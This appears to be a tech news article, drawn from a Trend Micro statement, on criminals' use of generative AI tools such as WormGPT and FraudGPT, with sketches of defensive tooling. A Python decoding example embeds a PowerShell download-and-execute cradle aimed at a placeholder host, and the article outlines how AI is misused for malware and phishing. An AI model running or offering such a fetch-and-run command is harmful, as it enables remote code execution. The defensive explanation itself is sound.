Trend Micro highlights dark side of generative AI tools
Trend Micro has shared more details of its ongoing commitment to protect customers around the world from emerging AI threats.
Mick McCluney, Technical Director at Trend Micro ANZ, says, "AI tools like ChatGPT are taking the world by storm, but the technology is already being used by opportunistic threat actors to take advantage of gaps in enterprise security."
"Trend is leading the way globally in mitigating these threats through a prolific output of groundbreaking research and its own use of AI to supercharge both ASRM and XDR."
According to a statement from the company, Trend successfully blocked 73 billion threats for its global customer base in the first half of 2023, marking a 16% year-on-year increase. Those figures illustrate both the growing power of its threat detection capabilities and the sheer scale of today's threat landscape, the company states.
Emerging malicious AI tools including WormGPT and FraudGPT are already being built on top of open-source generative AI platforms to democratise cyber crime, making hackers more productive and attacks more likely to succeed.
Trend Research recently revealed how threat actors are strengthening impersonation tactics by combining deepfake and AI voice cloning technology with generative AI for more effective virtual kidnapping scams.
Adversaries leverage ChatGPT to filter and fuse large datasets for victim selection, and deepfakes are deployed to deceive victims into believing a close relative has been kidnapped, in order to extort a ransom.
Separate research from Trend uncovered the use of generative AI in training and supporting new threat actors, including activities such as:
- Developing malicious polymorphic code
- Creating detection-resistant malware
- Creating highly convincing phishing emails for business email compromise (BEC) and webpages in multiple languages
- Creating hacking tools
- Identifying and analysing vulnerabilities
- Identifying card data for fraud
- Accelerating tactic and technique learning
According to the company, these tools are continually improved by cyber criminals and made accessible through subscription-based pricing to further reduce barriers to entry for aspiring hackers. The development and deployment of malicious AI has put escalating pressure on security teams to detect and respond to threats earlier and faster to ensure quicker containment and minimal damage.
Empowering security teams to detect and respond to malicious AI use, Trend Vision One leverages its own generative AI through the Companion virtual assistant, in addition to AI app detection models, to help SOC analysts match the speed and polymorphic nature of AI-driven attacks.
It features:
- XDR Incident Feature: Accelerating threat event understanding, saving time spent researching and contextualising alerts. On average it saves three minutes per alert, amounting to several hours per user per week.
- Command-Line Feature: Streamlining and simplifying the decoding of complex scripts, saving analysts up to 40 minutes of manual investigation time per case (see the sketch after this list).
- Search Query Generator: Transforming plain-language search queries into formal search syntax, saving up to one hour of threat-hunting time by assisting users with query development and with identifying field names, operators and values.
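To give a sense of the kind of manual work the Command-Line feature streamlines, the sketch below decodes a base64-encoded PowerShell command of the sort analysts routinely encounter in alert telemetry. The sample command line and helper function are illustrative assumptions for this article, not Trend's implementation.

```python
import base64
import re


def decode_encoded_powershell(command_line: str) -> str | None:
    """Extract and decode a -EncodedCommand payload from a PowerShell
    command line (PowerShell encodes it as base64 over UTF-16LE text)."""
    match = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)",
                      command_line, re.IGNORECASE)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-16-le")


# Hypothetical obfuscated download cradle as it might appear in telemetry.
payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
sample = ("powershell.exe -nop -w hidden -enc "
          + base64.b64encode(payload.encode("utf-16-le")).decode("ascii"))

print(decode_encoded_powershell(sample))  # recovers the original script
```

Doing this by hand across dozens of alerts is exactly the kind of repetitive decoding and contextualising work the Companion assistant is pitched at automating.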
Trend has been building AI-powered solutions since 2005 and continues to make current and planned AI/ML and generative AI investments, including tooling designed to detect BEC attacks. Its Writing Style DNA technology learns a sender's normal email writing style from previous messages and flags emails that deviate from this baseline. It blocked more than 130,000 BEC attacks for customers in this way throughout 2022.
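As a rough illustration of the general idea behind writing-style baselining, the sketch below builds a per-sender baseline from a handful of simple stylometric features and scores how far a new email deviates from it. The feature set, scoring and thresholding are assumptions for demonstration only, not Trend's Writing Style DNA model.

```python
# Minimal sketch of writing-style anomaly detection, assuming a simple
# stylometric feature set (average sentence length plus function-word rates).
# Illustrative only; not Trend's Writing Style DNA model.
import re
import statistics

FUNCTION_WORDS = ["the", "and", "to", "of", "please", "kindly", "urgent"]


def style_features(text: str) -> list[float]:
    """Turn an email body into a small stylometric feature vector."""
    words = re.findall(r"[a-z']+", text.lower())
    sentences = [s for s in re.split(r"[.!?]+", text) if s.strip()]
    total_words = max(len(words), 1)
    features = [len(words) / max(len(sentences), 1)]  # average sentence length
    features += [words.count(w) / total_words for w in FUNCTION_WORDS]
    return features


def build_baseline(previous_emails: list[str]) -> tuple[list[float], list[float]]:
    """Learn the sender's normal style as per-feature means and spreads."""
    vectors = [style_features(e) for e in previous_emails]
    means = [statistics.mean(col) for col in zip(*vectors)]
    spreads = [statistics.pstdev(col) or 1e-6 for col in zip(*vectors)]
    return means, spreads


def deviation_score(email: str, means: list[float], spreads: list[float]) -> float:
    """Average absolute z-score; higher means the email reads less like the sender."""
    feats = style_features(email)
    return sum(abs(f - m) / s for f, m, s in zip(feats, means, spreads)) / len(feats)
```

An incoming email whose score sits well outside the sender's historical range would then be flagged for review, which is the same deviation-from-baseline principle the article describes, applied here with deliberately simple features.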